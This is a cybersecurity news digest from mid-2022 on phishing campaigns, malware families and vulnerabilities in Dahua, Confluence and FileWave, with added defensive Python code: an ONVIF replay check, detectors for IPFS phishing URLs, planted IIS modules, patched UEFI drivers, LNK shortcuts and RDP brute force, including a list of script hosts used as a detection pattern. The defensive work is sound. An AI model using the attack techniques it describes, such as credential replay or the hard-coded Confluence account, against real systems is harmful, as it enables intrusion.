    The Federal Communications Commission (FCC), an independent agency of the United States federal government, alerted mobile users to an uptick in SMS (Short Message Service) phishing campaigns that aim to steal their money and snatch their private data. Threat actors behind these types of attacks, also known as smishing or robotexts, may employ a variety of enticements to deceive targets into disclosing sensitive information. As defined in one of our previous articles, smishing is a type of phishing attack in which cybercriminals use text messages to trick their victims into opening malicious attachments or clicking on malicious links.

    Dahua IP Camera Vulnerability Could Let Attackers Take Full Control Over Devices

    On Thursday, Nozomi Networks disclosed details of a vulnerability in Dahua’s Open Network Video Interface (ONVIF) Forum Standard implementation, which, when exploited, can lead to seizing control of IP cameras. Tracked as CVE-2022-30563, the flaw received a CVSS score of 7.4, indicating a high level of severity. According to Nozomi Networks, the vulnerability could be abused by attackers to “compromise network cameras by sniffing a previous unencrypted ONVIF interaction and replaying the credentials in a new request towards the camera.”
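    To show why a captured, unencrypted UsernameToken can be replayed against a device that neither bounds the Created timestamp nor remembers nonces, and what the server-side check looks like, here is an added Python example written for this digest; it is not Dahua’s or ONVIF’s code, and it assumes the standard WS-Security PasswordDigest construction (Base64 of SHA-1 over nonce, Created and password) with constructed sample credentials.

```python
"""WS-UsernameToken (PasswordDigest) verification with and without replay protection.

ONVIF devices authenticate SOAP requests with a WS-Security UsernameToken whose
PasswordDigest = Base64(SHA-1(nonce || Created || password)). A device that only
recomputes the digest accepts the same token again, which is the replay case.
Example code for this digest, not a vendor implementation.
"""
import base64
import hashlib
import hmac
import os
from datetime import datetime, timedelta, timezone

FMT = "%Y-%m-%dT%H:%M:%SZ"


def make_digest(nonce: bytes, created: str, password: str) -> str:
    """PasswordDigest as defined by WS-Security UsernameToken Profile 1.0."""
    h = hashlib.sha1(nonce + created.encode() + password.encode()).digest()
    return base64.b64encode(h).decode()


def build_token(username: str, password: str, now: datetime) -> dict:
    """Client side: fresh random nonce plus the current UTC time."""
    nonce = os.urandom(16)
    created = now.strftime(FMT)
    return {
        "Username": username,
        "Nonce": base64.b64encode(nonce).decode(),
        "Created": created,
        "PasswordDigest": make_digest(nonce, created, password),
    }


class NaiveVerifier:
    """Checks only that the digest matches: a sniffed token works forever."""

    def __init__(self, users: dict):
        self.users = users

    def verify(self, token: dict, now: datetime) -> bool:
        password = self.users.get(token["Username"])
        if password is None:
            return False
        nonce = base64.b64decode(token["Nonce"])
        expected = make_digest(nonce, token["Created"], password)
        return hmac.compare_digest(expected, token["PasswordDigest"])


class HardenedVerifier(NaiveVerifier):
    """Also bounds Created to a freshness window and rejects reused nonces."""

    def __init__(self, users: dict, window: timedelta = timedelta(minutes=5)):
        super().__init__(users)
        self.window = window
        self.seen = {}  # nonce -> time after which it can be forgotten

    def verify(self, token: dict, now: datetime) -> bool:
        if not super().verify(token, now):
            return False
        created = datetime.strptime(token["Created"], FMT).replace(tzinfo=timezone.utc)
        if abs(now - created) > self.window:
            return False  # stale or future-dated token
        # Forget nonces whose Created time is already outside the window.
        self.seen = {n: exp for n, exp in self.seen.items() if exp > now}
        if token["Nonce"] in self.seen:
            return False  # replay of a token already accepted
        self.seen[token["Nonce"]] = created + self.window
        return True


def demo() -> dict:
    """Constructed scenario: one captured token presented twice to each verifier."""
    users = {"admin": "constructed-sample-password"}
    t0 = datetime(2022, 8, 1, 12, 0, 0, tzinfo=timezone.utc)
    captured = build_token("admin", users["admin"], t0)
    naive, hardened = NaiveVerifier(users), HardenedVerifier(users)
    tampered = dict(captured, PasswordDigest=make_digest(b"x", captured["Created"], "guess"))
    return {
        "naive_first": naive.verify(captured, t0),
        "naive_replay": naive.verify(captured, t0 + timedelta(hours=1)),
        "hardened_first": hardened.verify(captured, t0),
        "hardened_replay": hardened.verify(captured, t0 + timedelta(seconds=30)),
        "hardened_fresh": hardened.verify(build_token("admin", users["admin"], t0), t0 + timedelta(seconds=30)),
        "hardened_stale": hardened.verify(build_token("admin", users["admin"], t0), t0 + timedelta(hours=1)),
        "bad_digest": hardened.verify(tampered, t0),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'accepted' if ok else 'rejected'}")
```

    Nonce tracking only narrows the window; the sniffing step itself is removed by carrying ONVIF over TLS.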

    Spanish Police Arrest Alleged Radioactive Monitoring Hackers

    Spanish law enforcement officials recently arrested two individuals suspected of hacking the country’s Radioactivity Alert Network (RAR). RAR is a network of gamma radiation sensors that is operated by Spain’s General Directorate of Civil Protection and Emergencies (DGPCE). The system is deployed in certain parts of Spain, especially near nuclear power plants, in order to monitor excessive radiation levels.

    Microsoft Experts Linked the Raspberry Robin Malware to Evil Corp Operation

    On July 26, 2022, Microsoft researchers discovered that the FakeUpdates malware was being distributed via the Raspberry Robin malware. “Raspberry Robin is a Windows worm discovered by cybersecurity researchers from Red Canary, the malware propagates through removable USB devices (T1091)” (Security Affairs, 2022). The malware was first spotted in September 2021. Its malicious code uses Windows Installer (T1543.003) to reach out to QNAP-associated domains to download a malicious DLL (T1105). It uses Tor exit nodes as a backup C2 infrastructure (T1090.003). It has been targeting the technology and manufacturing industries through infected removable drives, most commonly USB devices.

    Exploitation Is Underway for a Critical Flaw in Atlassian Confluence Server and Data Center

    Atlassian recently released security updates to address a critical hard-coded credentials vulnerability in Confluence Server and Data Center, tracked as CVE-2022-26138. A remote, unauthenticated attacker can exploit the vulnerability to log into unpatched servers. When the Questions for Confluence app (versions 2.7.34, 2.7.35, and 3.0.2) is installed, a Confluence user account with the username “disabledsystemuser” is created. The account is meant to allow administrators to migrate data from the app to Confluence Cloud. The bad news is that the account is created with a hard-coded password and is added to the confluence-users group, which by default allows viewing and editing all non-restricted pages within Confluence.

    New ‘Robin Banks’ phishing service targets BofA, Citi, and Wells Fargo

    A new phishing as a service (PhaaS) platform named 'Robin Banks' has been launched, offering ready-made phishing kits targeting the customers of well-known banks and online services. The targeted entities include Citibank, Bank of America, Capital One, Wells Fargo, PNC, U.S. Bank, Lloyds Bank, the Commonwealth Bank in Australia, and Santander. Additionally, Robin Banks offers templates to steal Microsoft, Google, Netflix, and T-Mobile accounts.

    Hackers Opting New Attack Methods After Microsoft Blocked Macros by Default

    With Microsoft taking steps to block Excel 4.0 (XLM or XL4) and Visual Basic for Applications (VBA) macros by default across Office apps, malicious actors are responding with new tactics, techniques, and procedures (TTPs). According to Proofpoint, “the use of VBA and XL4 Macros decreased approximately 66% from October 2021 through June 2022.” In their place, adversaries are increasingly pivoting away from macro-enabled documents to other alternatives, including container files such as ISO and RAR as well as Windows Shortcut (LNK) files, in campaigns to distribute malware.

    1,000s of Phishing Attacks Blast Off From InterPlanetary File System

    The peer-to-peer network IPFS offers an ingenious base for cyberattacks and is seeing a stratospheric increase in malicious hosting. The distributed, peer-to-peer (P2P) InterPlanetary File System (IPFS) has become a hotbed of phishing-site storage: Thousands of emails containing phishing URLs utilizing IPFS are showing up in corporate inboxes. According to a report from Trustwave SpiderLabs, the company found more than 3,000 of these emails within its customer telemetry in the last three months. They lead victims to fake Microsoft Outlook login pages and other phishing webpages.
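
    Phishing pages on IPFS are reached through HTTP gateways, either path-style (gateway/ipfs/CID/...) or subdomain-style (CID.ipfs.gateway/...), so a mail filter can recognise them by the content identifier rather than by the gateway's domain. The following is an added example, not code from Trustwave or the IPFS project: it extracts the CID and gateway from URLs in constructed email bodies. The CIDs and messages are made up for the example; the CIDv1 pattern is limited to the base32 form normally seen in gateway URLs.

```python
import re
from urllib.parse import urlparse

# CIDv0: "Qm" + 44 base58btc chars. CIDv1 in gateway URLs is normally base32 (multibase prefix "b").
CID_RE = re.compile(r"^(?:Qm[1-9A-HJ-NP-Za-km-z]{44}|[bB][a-zA-Z2-7]{50,})$")
URL_RE = re.compile(r"""https?://[^\s"'<>()]+""")


def extract_ipfs_reference(url):
    """Return (gateway_host, cid, path) when url addresses IPFS content through a gateway, else None.
    Covers path gateways (host/ipfs/<cid>/...) and subdomain gateways (<cid>.ipfs.host/...)."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    segments = [s for s in parsed.path.split("/") if s]
    if len(segments) >= 2 and segments[0].lower() == "ipfs" and CID_RE.match(segments[1]):
        return host, segments[1], "/" + "/".join(segments[2:])
    labels = host.split(".")
    if len(labels) >= 3 and labels[1] == "ipfs" and CID_RE.match(labels[0]):
        return ".".join(labels[2:]), labels[0], parsed.path or "/"
    return None


def scan_message(body):
    """Pull every URL out of an email body and report the IPFS-hosted ones."""
    hits = []
    for url in URL_RE.findall(body):
        ref = extract_ipfs_reference(url)
        if ref:
            gateway, cid, path = ref
            hits.append({"url": url, "gateway": gateway, "cid": cid, "path": path})
    return hits


# Constructed messages; the CIDs are syntactically valid but chosen for the example, not taken from any campaign.
SAMPLE_MESSAGES = [
    "Your mailbox is full. Re-validate at https://ipfs.io/ipfs/QmYwAPJzv5CZsnA625s3Xf2nemtYgPpHdWEz79ojWnPbdG/index.html today.",
    "Shared document: https://bafybeigdyrzt5sfp7udm7hu76uh7y26nf3efuylqabf3oclgtqy55fbzdi.ipfs.dweb.link/login.html",
    "Quarterly update is at https://intranet.example.com/reports/ipfs/notacid/q2.pdf",
]


def scan_all(messages=SAMPLE_MESSAGES):
    return [scan_message(m) for m in messages]
```

    Keying detections on the CID rather than the gateway host matters because the same content is reachable through any public gateway, so blocking one gateway domain does nothing to the campaign.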

    Cybercriminals are Using Messaging Apps to Launch Malware Schemes

    According to research by Intel 471, threat actors are using Discord and Telegram to spread malware. These apps have elements which allow users to create and share programs inside the platform. Using the platform as a host, threat actors can distribute and execute malware (T1204.002) that allows them to steal credentials or other information from an unsuspecting user. Intel 471 researchers have discovered several information stealers that are freely available for download that rely on Discord or Telegram for their functionality.

    Hackers Scan for Vulnerabilities Within 15 Minutes of Disclosure

    System administrators have even less time to patch disclosed security vulnerabilities than previously thought, as a new report shows threat actors scanning for vulnerable endpoints within 15 minutes of a new CVE being publicly disclosed. According to Palo Alto's 2022 Unit 42 Incident Response Report, hackers are constantly monitoring software vendor bulletin boards for new vulnerability announcements they can leverage for initial access to a corporate network or to perform remote code execution.

    Microsoft: IIS extensions increasingly used as Exchange backdoors

    Microsoft says attackers increasingly use malicious Internet Information Services (IIS) web server extensions to backdoor unpatched Exchange servers, as they have lower detection rates than web shells. Because they are hidden deep inside the compromised servers and installed in the same location and with the same structure as legitimate modules, they are very hard to detect and provide attackers with a durable persistence mechanism.
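
    Because IIS modules are registered in applicationHost.config, one practical hunt is to diff that file against what ships with IIS: native modules whose DLL is loaded from outside the inetsrv directory, and managed modules whose .NET type comes from an assembly that is not part of the framework. The script below is an added example, not Microsoft's tooling; the configuration excerpt is constructed and the allow-list of managed namespaces is an assumption you would tune per server.

```python
import ntpath
import xml.etree.ElementTree as ET

# Managed module type prefixes that ship with ASP.NET / IIS (an allow-list assumed for this example).
KNOWN_MANAGED_PREFIXES = ("System.Web.", "System.ServiceModel.", "Microsoft.Web.")

# Constructed applicationHost.config excerpt: two stock native modules, one native module loaded from an
# unusual path under a stock-sounding name, one stock managed module and one unknown managed module
# scoped to a single site. Names and paths are illustrative, not indicators from any real incident.
SAMPLE_CONFIG = r"""<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <globalModules>
      <add name="UriCacheModule" image="%windir%\System32\inetsrv\cachuri.dll" />
      <add name="HttpCacheModule" image="%windir%\System32\inetsrv\cachhttp.dll" />
      <add name="HttpCacheModule2" image="C:\inetpub\temp\appPools\cachhttp2.dll" />
    </globalModules>
    <modules>
      <add name="Session" type="System.Web.SessionState.SessionStateModule" preCondition="managedHandler" />
    </modules>
  </system.webServer>
  <location path="Default Web Site">
    <system.webServer>
      <modules>
        <add name="CompressionModule" type="Compression.HttpCompressionModule, Compression" />
      </modules>
    </system.webServer>
  </location>
</configuration>"""


def _collect_modules(elem, scope, out):
    """Walk the config tree, remembering which <location path> we are under."""
    if elem.tag == "location":
        scope = elem.get("path", "")
    for child in elem:
        if child.tag == "add" and elem.tag == "globalModules":
            out.append(("native", scope, child))
        elif child.tag == "add" and elem.tag == "modules":
            out.append(("managed", scope, child))
        _collect_modules(child, scope, out)


def audit_iis_modules(config_xml):
    """Flag native modules whose DLL lives outside the inetsrv directory and managed modules whose
    type is not from a known framework namespace: the two places a planted IIS extension shows up."""
    modules = []
    _collect_modules(ET.fromstring(config_xml), "MACHINE", modules)
    findings = []
    for kind, scope, add in modules:
        name = add.get("name", "")
        if kind == "native":
            image_dir = ntpath.normcase(ntpath.dirname(add.get("image", "")))
            if not image_dir.endswith(ntpath.normcase(r"\System32\inetsrv")):
                findings.append({"scope": scope, "name": name,
                                 "reason": "native module outside inetsrv", "detail": add.get("image")})
        else:
            type_name = add.get("type", "")
            if type_name and not type_name.startswith(KNOWN_MANAGED_PREFIXES):
                findings.append({"scope": scope, "name": name,
                                 "reason": "managed module from unrecognised assembly", "detail": type_name})
    return findings
```

    A real run would feed it %windir%\System32\inetsrv\config\applicationHost.config plus each site's web.config, and should be paired with a hash check of the flagged DLLs, since a backdoor can also overwrite a legitimate module in place.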

    Threat Actor "Beeper" Plans Attacks Against Clients Of Unspecified Managed Service Provider

    A threat actor going by 'Beeper' is allegedly seeking a partner to coordinate cyber attacks against the clients of an unspecified managed service provider (MSP). The post was noticed by security researchers at ZeroFox, who found the message on the Russian-language dark web forum exploit[.]in. The actor claims to have access to the MSP’s administrative panel. According to the threat actor, the MSP manages 50 different US-based companies located in the same time zone. The resources impacted include over 100 VMware ESXi instances and 1,000 servers that likely contain sensitive data.

    No More Ransom Helped More Than 1.5 Million People Decrypt Their Devices

    Woburn, MA – July 26, 2022 – No More Ransom, the initiative launched to help victims of ransomware decrypt their files, has celebrated its six-year anniversary. Since the launch, it has grown from four partners to 188 and has contributed 136 decryption tools covering 165 ransomware families. In doing so, it has helped more than 1.5 million people decrypt their devices all over the world, with the project available in 37 languages.

    Threat Actor "Beeper" Plans Attacks Against Clients Of Unspecified Managed Service Provider

    Untested threat actor “Beeper” is seeking a partner to coordinate a large-scale cyber-attack against the clients of an unspecified managed service provider (MSP) on the Russian language Deep Web forum exploit[.]in. The actor claims to have access to the MSP’s administrative panel, where they currently manage resources for more than 50 different U.S.-based companies located in approximately the same time zone. These resources allegedly include more than 100 VMware instances and 1,000 servers that almost certainly contain sensitive data.

    Critical FileWave MDM Flaws Open Organization-Managed Devices to Remote Hackers

    On Monday, Claroty disclosed two critical security flaws impacting FileWave’s mobile device management (MDM) system that could be leveraged to carry out remote attacks and seize control of devices connected to the system. “The vulnerabilities are remotely exploitable and enable an attacker to bypass authentication mechanisms and gain full control over the MDM platform and its managed devices," Claroty security researcher Noam Moshe said in a report.

    CosmicStrand, A New Sophisticated UEFI Firmware Rootkit Linked to China

    Researchers from Kaspersky have spotted a UEFI firmware rootkit, named CosmicStrand, which has been attributed to an unknown Chinese-speaking threat actor. This malware was first spotted by Chinese firm Qihoo360 in 2017. While the initial attack vector is unclear, the rootkit has been located in firmware images of Gigabyte and ASUS motherboards designed around the H81 chipset (T1542.001). It is likely that a common vulnerability is being exploited by attackers to inject the rootkit into the firmware image. “In these firmware images, modifications have been introduced into the CSMCORE DXE driver, whose entry point has been patched to redirect to code added in the .reloc section. This code, executed during system startup (T1547), triggers a long execution chain which results in the download and deployment of a malicious component inside Windows,” reads the analysis published by the experts. “Looking at the various firmware images we were able to obtain, we assess that the modifications may have been performed with an automated patcher. If so, it would follow that the attackers had prior access to the victim’s computer in order to extract, modify and overwrite the motherboard’s firmware.”
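
    A DXE driver is an ordinary PE/COFF image, so the patch Kaspersky describes (entry point redirected into .reloc) is visible from the headers alone: AddressOfEntryPoint should fall inside an executable code section, never inside .reloc. The check below is an added example, not Kaspersky's tooling. It builds two constructed header-only PE32+ skeletons, one clean and one with the entry point moved into .reloc, and classifies them; in practice you would run it over every DXE driver extracted from a firmware dump.

```python
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
SECTION_HEADER = "<8sIIIIIIHHI"  # 40-byte IMAGE_SECTION_HEADER


def build_pe(sections, entry_rva):
    """Constructed PE32+ skeleton: DOS header, PE signature, COFF header, optional header, section table.
    Section data is omitted because the check below only needs the headers. Fixture, not a real driver."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)             # e_lfanew
    optional = bytearray(240)                            # PE32+ optional header size
    struct.pack_into("<H", optional, 0, 0x20B)           # Magic: PE32+
    struct.pack_into("<I", optional, 16, entry_rva)      # AddressOfEntryPoint
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, len(optional), 0x2022)
    table = b"".join(
        struct.pack(SECTION_HEADER, name.encode().ljust(8, b"\0"), size, rva, size, 0, 0, 0, 0, 0, chars)
        for name, rva, size, chars in sections
    )
    return bytes(dos) + b"PE\0\0" + coff + bytes(optional) + table


def read_headers(data):
    """Return (entry_rva, sections) from a PE/COFF image such as a DXE driver extracted from firmware."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    n_sections = struct.unpack_from("<H", data, pe_off + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe_off + 20)[0]
    opt_off = pe_off + 24
    entry = struct.unpack_from("<I", data, opt_off + 16)[0]
    sections = []
    for i in range(n_sections):
        name, vsize, vaddr, rawsize, *_rest, chars = struct.unpack_from(
            SECTION_HEADER, data, opt_off + opt_size + i * 40)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"), "rva": vaddr,
                         "size": max(vsize, rawsize), "executable": bool(chars & IMAGE_SCN_MEM_EXECUTE)})
    return entry, sections


def entry_point_anomaly(data):
    """None when the entry point lands in an executable code section; otherwise a reason string.
    An entry point redirected into .reloc is exactly the patch described for CosmicStrand."""
    entry, sections = read_headers(data)
    home = next((s for s in sections if s["rva"] <= entry < s["rva"] + s["size"]), None)
    if home is None:
        return f"entry point 0x{entry:x} lies outside every section"
    if home["name"] == ".reloc" or not home["executable"]:
        return f"entry point 0x{entry:x} lies in {home['name']} (executable={home['executable']})"
    return None


# Constructed layouts: the same driver before and after its entry point is redirected into .reloc.
TEXT, DATA, RELOC = 0x60000020, 0xC0000040, 0x42000040   # typical characteristics for .text/.data/.reloc
LAYOUT = [(".text", 0x1000, 0x2000, TEXT), (".data", 0x3000, 0x1000, DATA), (".reloc", 0x4000, 0x1000, RELOC)]
CLEAN_DRIVER = build_pe(LAYOUT, entry_rva=0x1200)
PATCHED_DRIVER = build_pe(LAYOUT, entry_rva=0x4010)
```

    Firmware loaders do not enforce section permissions the way an OS does, so code planted in .reloc runs fine; the header check works because the patcher changed the entry point, not because the section is non-executable.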

    Lockbit Ramps Up Attacks on Public Sector

    The prolific Lockbit ransomware gang appears to have claimed another two scalps in recent days: the Canadian town of St Marys and the Italian tax agency. The local administration at St Marys explained in an update on Friday that the attack occurred last Wednesday, locking an internal server and encrypting data on it. “Upon learning of the incident, staff took immediate steps to secure any sensitive information, including locking down the town’s IT systems and restricting access to email. The town also notified its legal counsel, the Stratford Police Service and the Canadian Centre for Cyber Security,” a statement read.

    North Korean Hackers Attack EU Targets With Konni Rat Malware

    Researchers at Securonix recently uncovered a campaign that is targeting high-value organizations in the Czech Republic, Poland, and other European countries with Konni malware. Konni is a remote access trojan that has been associated with North Korean cyberattacks since 2014. Like any other RAT, Konni is capable of establishing persistence and performing privilege escalation on the host.

    Amadey Malware Pushed via Software Cracks in SmokeLoader Campaign

    A new version of the Amadey Bot malware is being distributed through the SmokeLoader malware, using software cracks and keygen sites as lures (T1608.001). Amadey Bot is a malware strain discovered four years ago, capable of performing system reconnaissance, stealing information, and loading additional payloads. Amadey has been around for some time, but its distribution dwindled in 2020. Researchers at South Korean firm AhnLab found that a new strain of Amadey is being spread by SmokeLoader; Amadey had historically relied on the Fallout and RIG exploit kits. “SmokeLoader is downloaded and executed voluntarily by the victims, masked as a software crack or keygen.”

    Google Chrome Now! New Version Includes 11 Important Security Patches

    The latest Google Chrome update includes 11 security fixes, some of which could be exploited by an attacker to take control of an affected system. Google Chrome’s Stable channel has been updated to 103.0.5060.134 for Windows, Mac, and Linux, and the new version will roll out over the coming days/weeks. Of the 11 security fixes five are use-after-free issues, including four that are marked with a severity of “high.” Use after free (UAF) vulnerabilities occur because of the incorrect use of dynamic memory during a program’s operation.

    Candiru Spyware Caught Exploiting Google Chrome Zero-Day to Target Journalists

    Earlier this month, Google addressed a high severity zero-day vulnerability impacting its Chrome browser. Tracked as CVE-2022-2294, the flaw is related to a memory corruption bug in the WebRTC component of Chrome browser which, if successfully exploited, could lead to shellcode execution on the target device. While Google stated that the vulnerability was being exploited in attacks in the wild, the tech firm did not disclose the details of such attacks.

    Hackers Breach Ukrainian Radio Network to Spread Fake News About Zelensky

    Ukrainian media group TAVR Media confirmed on Thursday that it was hacked to spread fake news about President Zelensky being in critical condition and under intensive care. The company stated on Facebook that the cyber attack was carried out on the servers and networks of TAVR Media radio stations. According to the State Service of Special Communications and Information Protection of Ukraine (SSSCIP), the network operates nine major Ukrainian radio stations, including Hit FM, Radio ROKS, KISS FM, Radio RELAX, Melody FM, Nashe Radio, Radio JAZZ, Classic Radio, and Radio Bayraktar.

    Qakbot Resurfaces With New Playbook

    Researchers from Cyble Research Labs discovered new IoCs related to the QakBot malware. QakBot has been leveraging a mass phishing campaign to target victims with a password-protected Zip file which contains an ISO file (T1566.001). The ISO file, when executed by the victim (T1204.002), will show a .lnk file masquerading as a PDF file (T1036.005). If the victim opens the .lnk file, the system is infected with QakBot malware.
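
    Both the macro-replacement trend described above and this QakBot chain end in a Windows shortcut (.lnk) that launches a script host while posing as a document, and a shortcut's real target and arguments are recoverable from its binary structure (MS-SHLLINK) without ever running it. The code below is an added example, not Cyble's or Microsoft's: it builds a constructed shortcut named like a PDF that points at cmd.exe, parses the header and StringData, and lists the triage reasons a gateway or sandbox would act on. The sample file, its arguments and the triage heuristics are assumptions for the demonstration.

```python
import struct
import uuid

LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046").bytes_le
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
# StringData fields appear in this fixed order when their LinkFlags bit is set (MS-SHLLINK 2.4).
STRING_FIELDS = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location")]
SW_SHOWMINNOACTIVE = 7
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe", "msiexec.exe"}


def _string_data(text):
    return struct.pack("<H", len(text)) + text.encode("utf-16-le")


def build_lnk(relative_path, arguments, icon_location="", show_command=SW_SHOWMINNOACTIVE):
    """Constructed minimal shortcut: 76-byte header plus StringData, no IDList or LinkInfo. A fixture only."""
    flags = IS_UNICODE | 0x08 | 0x20 | (0x40 if icon_location else 0)
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0, 0, 0, 0, 0, 0,
                         show_command, 0, 0, 0, 0)
    body = _string_data(relative_path) + _string_data(arguments)
    if icon_location:
        body += _string_data(icon_location)
    return header + body


def parse_lnk(data):
    """Decode the header and StringData of a Shell Link, skipping the variable-length IDList and LinkInfo."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link (.lnk) file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {"show_command": show_command}
    width, codec = (2, "utf-16-le") if flags & IS_UNICODE else (1, "cp1252")
    for bit, name in STRING_FIELDS:
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            fields[name] = data[pos:pos + count * width].decode(codec)
            pos += count * width
    return fields


def triage_lnk(filename, data):
    """Reasons a mail gateway or sandbox would hold this shortcut. Heuristics chosen for this example."""
    info = parse_lnk(data)
    reasons = []
    target = info.get("relative_path", "").lower().rsplit("\\", 1)[-1]
    if target in SCRIPT_HOSTS:
        reasons.append(f"target is a script host: {target}")
    stem = filename.lower()[:-4] if filename.lower().endswith(".lnk") else filename.lower()
    if stem.rsplit(".", 1)[-1] in ("pdf", "doc", "docx", "xls", "xlsx", "txt"):
        reasons.append("document-lookalike name")
    if info.get("icon_location") and target and target not in info["icon_location"].lower():
        reasons.append("icon borrowed from a different program")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("window minimised on launch")
    return info, reasons


# Constructed sample: a "PDF" that is really a shortcut running cmd.exe with a harmless echo.
SAMPLE_NAME = "Invoice_2022-07.pdf.lnk"
SAMPLE_LNK = build_lnk(r"..\..\..\Windows\System32\cmd.exe", "/c echo constructed-sample",
                       icon_location=r"%SystemRoot%\System32\shell32.dll")
```

    The same parser applies to shortcuts pulled out of an ISO or password-protected archive, which is where these campaigns put them so that the file arrives without a Mark-of-the-Web.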

    Windows 11 Is Getting a New Security Setting to Block Ransomware Attacks

    Microsoft is rolling out a new security default for Windows 11 that should go a long way toward preventing ransomware attacks that begin with password guessing and compromised credentials. The new default, an account lockout policy applied to account credentials, should help thwart ransomware attacks that start with compromised credentials or brute-force password attacks against Remote Desktop Protocol (RDP) endpoints, which are often exposed to the internet. RDP remains the top method of initial access in ransomware deployments, with groups specializing in compromising RDP endpoints and selling that access to others.
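
    Lockout limits the attacker; the defender still wants to see the attempt, which in the Windows Security log is a burst of 4625 failures from one source followed, in the bad case, by a 4624 success. The detector below is an added example, not Microsoft's: it runs a sliding-window count over a constructed log extract and escalates when a source that crossed the threshold then logs on successfully. The threshold, window and log lines are assumptions; the note that NLA-protected RDP failures appear as logon type 3 rather than 10 is why both types are counted.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

FAILURE_THRESHOLD = 10              # assumed: failures from one source before alerting
WINDOW = timedelta(minutes=10)      # assumed: sliding window for counting
RDP_LOGON_TYPES = {10, 3}           # 10 = RemoteInteractive; with NLA enabled failed RDP logons surface as type 3


def _ev(minute, event_id, ip, user, logon_type=10):
    return {"time": datetime(2022, 7, 25, 2, minute), "event_id": event_id,
            "ip": ip, "user": user, "logon_type": logon_type}


# Constructed Security-log extract: 12 failures from 203.0.113.7 against two accounts within eight minutes,
# then a success from the same source; 198.51.100.5 has a few scattered failures (a user mistyping).
SAMPLE_EVENTS = (
    [_ev(m, 4625, "203.0.113.7", "administrator") for m in range(0, 3)]
    + [_ev(m, 4625, "203.0.113.7", "admin") for m in range(1, 4)]
    + [_ev(m, 4625, "203.0.113.7", "administrator") for m in range(2, 8)]
    + [_ev(9, 4624, "203.0.113.7", "administrator")]
    + [_ev(m, 4625, "198.51.100.5", "jsmith") for m in (5, 20, 45)]
    + [_ev(12, 4625, "198.51.100.5", "jsmith", logon_type=2)]  # console logon, ignored
)


def detect_rdp_bruteforce(events, threshold=FAILURE_THRESHOLD, window=WINDOW):
    """Sliding-window count of 4625 failures per source IP; a 4624 from a source already over the
    threshold is escalated, because that is the moment a guessed password worked."""
    failures = defaultdict(deque)
    users = defaultdict(set)
    alerts, alerted = [], set()
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["logon_type"] not in RDP_LOGON_TYPES:
            continue
        q = failures[ev["ip"]]
        while q and ev["time"] - q[0] > window:
            q.popleft()
        if ev["event_id"] == 4625:
            q.append(ev["time"])
            users[ev["ip"]].add(ev["user"])
            if len(q) >= threshold and ev["ip"] not in alerted:
                alerted.add(ev["ip"])
                alerts.append({"type": "rdp_bruteforce", "ip": ev["ip"], "failures": len(q),
                               "users": sorted(users[ev["ip"]]), "at": ev["time"]})
        elif ev["event_id"] == 4624 and len(q) >= threshold:
            alerts.append({"type": "success_after_bruteforce", "ip": ev["ip"],
                           "user": ev["user"], "at": ev["time"]})
    return alerts
```

    Keying on the source address is deliberate: per-account counting misses password spraying, where each account sees only one or two failures while the source racks up hundreds.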

    Google Releases Security Updates for Chrome

    Google has released Chrome version 103.0.5060.134 for Windows, Mac, and Linux. This version addresses vulnerabilities that an attacker could exploit to take control of an affected system. CISA encourages users and administrators to review the Chrome Release Note and apply the necessary updates.

    Oracle Releases July 2022 Critical Patch Update

    Oracle has released its Critical Patch Update for July 2022 to address 349 vulnerabilities across multiple products. A remote attacker could exploit some of these vulnerabilities to take control of an affected system. CISA encourages users and administrators to review the Oracle July 2022 Critical Patch Update and apply the necessary updates.

    How Conti Ransomware Hacked and Encrypted the Costa Rican Government

    Details have emerged on how the Conti ransomware gang breached the Costa Rican government, showing the attack's precision and the speed of moving from initial access to the final stage of encrypting devices. This is the last attack from the Conti ransomware operation before the group transitioned to a different form of organization that relies on multiple cells working with other gangs.

    Hackers Target Ukrainian Software Company Using GoMet Backdoor

    A large software development company whose software is used by different state entities in Ukraine was at the receiving end of an "uncommon" piece of malware, new research has found. The malware, first observed on the morning of May 19, 2022, is a custom variant of the open source backdoor known as GoMet and is designed for maintaining persistent access to the network. "This access could be leveraged in a variety of ways including deeper access or to launch additional attacks, including the potential for software supply chain compromise," Cisco Talos said in a report.

    Atlassian Rolls Out Security Patch for Critical Confluence Vulnerability

    Atlassian recently patched a critical hard-coded credentials vulnerability affecting the Questions for Confluence app for Confluence Server and Confluence Data Center. According to Atlassian, when the app is enabled on Confluence Server or Data Center, it creates a Confluence user account with the username “disabledsystemuser.” While Atlassian says this account is designed to aid administrators migrating data from the app to Confluence Cloud, the account is created with a hard-coded password and is added to the confluence-users group by default. In turn, this could allow an unauthorized individual to view and edit all non-restricted pages within Confluence.

